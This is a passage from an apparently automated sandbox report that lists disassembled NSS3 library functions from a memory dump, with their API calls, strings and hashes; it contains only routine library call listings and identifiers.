Part of subcall function 6C5B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5B08B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C5BCD93,?), ref: 6C5BCF1D

Part of subcall function 6C5AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5A8D2D,?,00000000,?), ref: 6C5AFB85
Part of subcall function 6C5AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5AFBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C5BCD93,?), ref: 6C5BCF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C5BCD93,?), ref: 6C5BCF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6C5BCD93,?,?,?,?,?,?,?,?,?,?,?,6C5BCD93,?), ref: 6C5BCF78

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: c69bd00946e512416fb7182021ac85f13ad26acd9bc7b8b1a7da3b05fbfbd6f3
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 0211D5B1E002089BE740AA666C61B6BBAEC9F8414DF004039FC09E7741FB70ED08C6B1

Function 6C568C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C568C1B
EnterCriticalSection.KERNEL32 ref: 6C568C34
PL_ArenaAllocate.NSS3 ref: 6C568C65
PR_Unlock.NSS3 ref: 6C568C9C
PR_Unlock.NSS3 ref: 6C568CB6

Part of subcall function 6C5FDD70: TlsGetValue.KERNEL32 ref: 6C5FDD8C
Part of subcall function 6C5FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5FDDB4

Strings

KRAM, xrefs: 6C568C8F

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: 8734da65288705931d54dea1f7b6d452ccfd832f66754ff1c1364af8dfebc599
Instruction ID: 7de8898306c16fc36538a81d082254105cbb17a99796eaf2e8cf644b8c825df7
Opcode Fuzzy Hash: 8734da65288705931d54dea1f7b6d452ccfd832f66754ff1c1364af8dfebc599
Instruction Fuzzy Hash: 422160B1605601DFE700AF7AC884559BBF4FF56318F05896AD888CBB21EB35D885CB92

Function 6C578E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6C592E62,?,?,?,?,?,?,?,00000000,?,?,?,6C564F1C), ref: 6C578EA2

Part of subcall function 6C59F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C59F854
Part of subcall function 6C59F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C59F868
Part of subcall function 6C59F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C59F882
Part of subcall function 6C59F820: free.MOZGLUE(04C483FF,?,?), ref: 6C59F889
Part of subcall function 6C59F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C59F8A4
Part of subcall function 6C59F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C59F8AB
Part of subcall function 6C59F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C59F8C9
Part of subcall function 6C59F820: free.MOZGLUE(280F10EC,?,?), ref: 6C59F8D0

PK11_IsLoggedIn.NSS3(?,?,?,6C592E62,?,?,?,?,?,?,?,00000000,?,?,?,6C564F1C), ref: 6C578EC3
TlsGetValue.KERNEL32(?,?,?,6C592E62,?,?,?,?,?,?,?,00000000,?,?,?,6C564F1C), ref: 6C578EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6C592E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C578EF1
PR_Unlock.NSS3 ref: 6C578F20

Strings

b.Yl, xrefs: 6C578E96, 6C578F25

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID: b.Yl
API String ID: 1978757487-2915385360
Opcode ID: 6ad66c9a1257611f5b77e19af326551cb35ef6c8b0272db3c17ce1204ade29cf
Instruction ID: 701d845be9d67583d1f691367826598c2e5fcd5879d5ddac258bac286ab724b9
Opcode Fuzzy Hash: 6ad66c9a1257611f5b77e19af326551cb35ef6c8b0272db3c17ce1204ade29cf
Instruction Fuzzy Hash: DB215E70909605AFD710AF29D884599BBF0FF48314F45456EEC9897B41D730E894CBE6

Function 6C5A8970 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,6C5561C4,?,6C555639,00000000), ref: 6C5A8991
TlsGetValue.KERNEL32(?,?,?,?,?,6C555639,00000000), ref: 6C5A89AD
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C555639,00000000), ref: 6C5A89C6
PR_WaitCondVar.NSS3 ref: 6C5A89F7
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C555639,00000000), ref: 6C5A8A0C

Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407AD
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407CD
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407D6
Part of subcall function 6C5407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4D204A), ref: 6C5407E4
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,6C4D204A), ref: 6C540864
Part of subcall function 6C5407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C540880
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,6C4D204A), ref: 6C5408CB
Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(?,?,6C4D204A), ref: 6C5408D7
Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(?,?,6C4D204A), ref: 6C5408FB

Strings

9VUl, xrefs: 6C5A8986

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID: 9VUl
API String ID: 2759447159-1201585751
Opcode ID: 5870b01b70190dfc0ca15ef4e18ff6e6fa1dc60fc91057b550cc2af4029fb64a
Instruction ID: abbc6ebe9c714dc54c633f04bd0a62ed9bd03fd4f13b92ab58333d5bb4059271
Opcode Fuzzy Hash: 5870b01b70190dfc0ca15ef4e18ff6e6fa1dc60fc91057b550cc2af4029fb64a
Instruction Fuzzy Hash: 0A217CB0904645DFCB00AFAAC8842ADBBF0FF46358F114A66DC9896601E730D895CB97

Function 6C662C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C662CA0
PR_ExitMonitor.NSS3 ref: 6C662CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C662CD1
strdup.MOZGLUE(?), ref: 6C662CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C662D27

Strings

Loaded library %s (static lib), xrefs: 6C662D22

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 4da5019ca070c725ee27e1cc525ece3ac57c422bbfad94804546762ef95a9df0
Instruction ID: 867256830fa122100ef2c6d5ad1237fcd80f741556f7a163e43a4f61371eaaa6
Opcode Fuzzy Hash: 4da5019ca070c725ee27e1cc525ece3ac57c422bbfad94804546762ef95a9df0
Instruction Fuzzy Hash: 0911C8B1701245AFEB008F17D885A6677B5AB4635DF14813DD909C7F41E731E818CB9E

Function 6C5568E0 Relevance: 10.6, APIs: 7, Instructions: 56COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5568FB
EnterCriticalSection.KERNEL32 ref: 6C556913
PORT_FreeArena_Util.NSS3 ref: 6C55693E
PR_Unlock.NSS3 ref: 6C556946
DeleteCriticalSection.KERNEL32 ref: 6C556951
free.MOZGLUE ref: 6C55695D
PR_Unlock.NSS3 ref: 6C556968

Part of subcall function 6C5FDD70: TlsGetValue.KERNEL32 ref: 6C5FDD8C
Part of subcall function 6C5FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5FDDB4

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: CriticalSection$UnlockValue$Arena_DeleteEnterFreeLeaveUtilfree
String ID:
API String ID: 1628394932-0
Opcode ID: 9767580126ad6964c88608db63e30af98d7949196d28ddd981f42614c7f6b38c
Instruction ID: f7b553b1416ad6826255f07f27a7fb21dc8e82b740087c329bead9cb7d357ba9
Opcode Fuzzy Hash: 9767580126ad6964c88608db63e30af98d7949196d28ddd981f42614c7f6b38c
Instruction Fuzzy Hash: C3117CB06047459FDB00AFB9C8C856EBBF4BF42344F014929D899DB701EB31E898CB92

Function 6C5B0FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5587ED,00000800,6C54EF74,00000000), ref: 6C5B1000
PR_NewLock.NSS3(?,00000800,6C54EF74,00000000), ref: 6C5B1016

Part of subcall function 6C6198D0: calloc.MOZGLUE(00000001,00000084,6C540936,00000001,?,6C54102C), ref: 6C6198E5

PL_InitArenaPool.NSS3(00000000,security,6C5587ED,00000008,?,00000800,6C54EF74,00000000), ref: 6C5B102B
TlsGetValue.KERNEL32(00000000,?,?,6C5587ED,00000800,6C54EF74,00000000), ref: 6C5B1044
free.MOZGLUE(00000000,?,00000800,6C54EF74,00000000), ref: 6C5B1064

Strings

security, xrefs: 6C5B1025

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: ffbad44645c94639392b412bd0236ed6a8392de24518bcb3ea2550995e133761
Instruction ID: 85f0160f7b6c8d8d29a875a50dea99b58f1885813120c64e3ac52c17b13b3fc2
Opcode Fuzzy Hash: ffbad44645c94639392b412bd0236ed6a8392de24518bcb3ea2550995e133761
Instruction Fuzzy Hash: 5201AB30600254A7E7606F3E9C44B573E78BF47789F000526E808E7A51EB31C114CBDA

Function 6C5F49C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000678,?,?,6C5E5F34,00000A20), ref: 6C5F49EC

Part of subcall function 6C5AFAB0: free.MOZGLUE(?,-00000001,?,?,6C54F673,00000000,00000000), ref: 6C5AFAC7

SECITEM_ZfreeItem_Util.NSS3(?,00000000,6C5E5F34,00000A20,?,?,?,?,?,?,?,?,?,6C5EAAD4), ref: 6C5F49F9
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,6C5E5F34,00000A20,?,?,?,?,?,?,?,?,?,6C5EAAD4), ref: 6C5F4A06
free.MOZGLUE(?,?,?,?,?,6C5E5F34,00000A20), ref: 6C5F4A16
free.MOZGLUE(?,?,?,?,?,6C5E5F34,00000A20), ref: 6C5F4A1C

Strings

4_^l , xrefs: 6C5F49C6, 6C5F4A21

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Item_UtilZfreefree
String ID: 4_^l
API String ID: 2193358613-2334407531
Opcode ID: a5f3c28be999364892f15d8f094667be74528ba5959bb61828396edad3ef804a
Instruction ID: 610daf71c3de19a255b8e0813216c067bfb95240adab2c87eccdaa9d52c3dac3
Opcode Fuzzy Hash: a5f3c28be999364892f15d8f094667be74528ba5959bb61828396edad3ef804a
Instruction Fuzzy Hash: 35017176A001049FCB00CF69DDC4C967BBCEF8924874481A5E909CB701E731ED05CBB1

Function 6C5AA970 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 442f824d8f9a184f005972045b03b6013ba672a6c4ddb422f997d50dfe951482
Instruction ID: d34bc9b0b1a115cafc51c4246233f673bcad130cac208ceb138be285965e3b0c
Opcode Fuzzy Hash: 442f824d8f9a184f005972045b03b6013ba672a6c4ddb422f997d50dfe951482
Instruction Fuzzy Hash: 2D910A30D041684FCB25CE9B8C913DEB7B5AF4A31CF1485EAC5999BA01D6318E878FD5

Function 6C5F2E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5F3046

Part of subcall function 6C5DEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5DEE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C5C7FFB), ref: 6C5F312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5F3154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C5F2E8B

Part of subcall function 6C5FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5FC2BF

Part of subcall function 6C5DF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C5C9BFF,?,00000000,00000000), ref: 6C5DF134

memcpy.VCRUNTIME140(8B3C75C0,?,6C5C7FFA), ref: 6C5F2EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5F317B

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: 08485dba8e21b6686aef4b5714b75b9d6b54f21061642c6386fd7ff4350a51eb
Instruction ID: 4e2a810e058d28e3b80efd2deb57624f83986861da420cf69964a0e48bc31f90
Opcode Fuzzy Hash: 08485dba8e21b6686aef4b5714b75b9d6b54f21061642c6386fd7ff4350a51eb
Instruction Fuzzy Hash: F2A1D1B1A002189FDB24CF54CC81BEAB7B5EF45308F048199ED596B741E771AD46CF92

Function 6C5BED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C5BED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C5BEDCE

Part of subcall function 6C5B0BE0: malloc.MOZGLUE(6C5A8D2D,?,00000000,?), ref: 6C5B0BF8
Part of subcall function 6C5B0BE0: TlsGetValue.KERNEL32(6C5A8D2D,?,00000000,?), ref: 6C5B0C15

free.MOZGLUE(00000000,?,?,?,?,6C5BB04F), ref: 6C5BEE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C5BEECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C5BEEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C5BEEFB

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: 165e27e10b322d9be49f5d8eba94477804ee12e9e609c69e4e58bd229f514323
Instruction ID: 08b1928bec3aa8584c3bbbfed372fed289292601b9be48bc7dcb63868d20722b
Opcode Fuzzy Hash: 165e27e10b322d9be49f5d8eba94477804ee12e9e609c69e4e58bd229f514323
Instruction Fuzzy Hash: F7817CB5A002059FEB14CF59DCA0BAB7BF5BF89308F18446CE815AB751D7B0E814CBA1

Function 6C5BCCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5BC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C5BDAE2,?), ref: 6C5BC6C2

PR_Now.NSS3 ref: 6C5BCD35

Part of subcall function 6C619DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C660A27), ref: 6C619DC6
Part of subcall function 6C619DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C660A27), ref: 6C619DD1
Part of subcall function 6C619DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C619DED

Part of subcall function 6C5A6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C551C6F,00000000,00000004,?,?), ref: 6C5A6C3F

PR_GetCurrentThread.NSS3 ref: 6C5BCD54

Part of subcall function 6C619BF0: TlsGetValue.KERNEL32(?,?,?,6C660A75), ref: 6C619C07

Part of subcall function 6C5A7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C551CCC,00000000,00000000,?,?), ref: 6C5A729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5BCD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C5BCE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C5BCE2C

Part of subcall function 6C5B10C0: TlsGetValue.KERNEL32(?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B10F3
Part of subcall function 6C5B10C0: EnterCriticalSection.KERNEL32(?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B110C
Part of subcall function 6C5B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B1141
Part of subcall function 6C5B10C0: PR_Unlock.NSS3(?,?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B1182
Part of subcall function 6C5B10C0: TlsGetValue.KERNEL32(?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C5BCE40

Part of subcall function 6C5B14C0: TlsGetValue.KERNEL32 ref: 6C5B14E0
Part of subcall function 6C5B14C0: EnterCriticalSection.KERNEL32 ref: 6C5B14F5
Part of subcall function 6C5B14C0: PR_Unlock.NSS3 ref: 6C5B150D

Part of subcall function 6C5BCEE0: PORT_ArenaMark_Util.NSS3(?,6C5BCD93,?), ref: 6C5BCEEE
Part of subcall function 6C5BCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C5BCD93,?), ref: 6C5BCEFC
Part of subcall function 6C5BCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C5BCD93,?), ref: 6C5BCF0B
Part of subcall function 6C5BCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C5BCD93,?), ref: 6C5BCF1D

Part of subcall function 6C5BCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C5BCD93,?), ref: 6C5BCF47
Part of subcall function 6C5BCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C5BCD93,?), ref: 6C5BCF67
Part of subcall function 6C5BCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C5BCD93,?,?,?,?,?,?,?,?,?,?,?,6C5BCD93,?), ref: 6C5BCF78

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

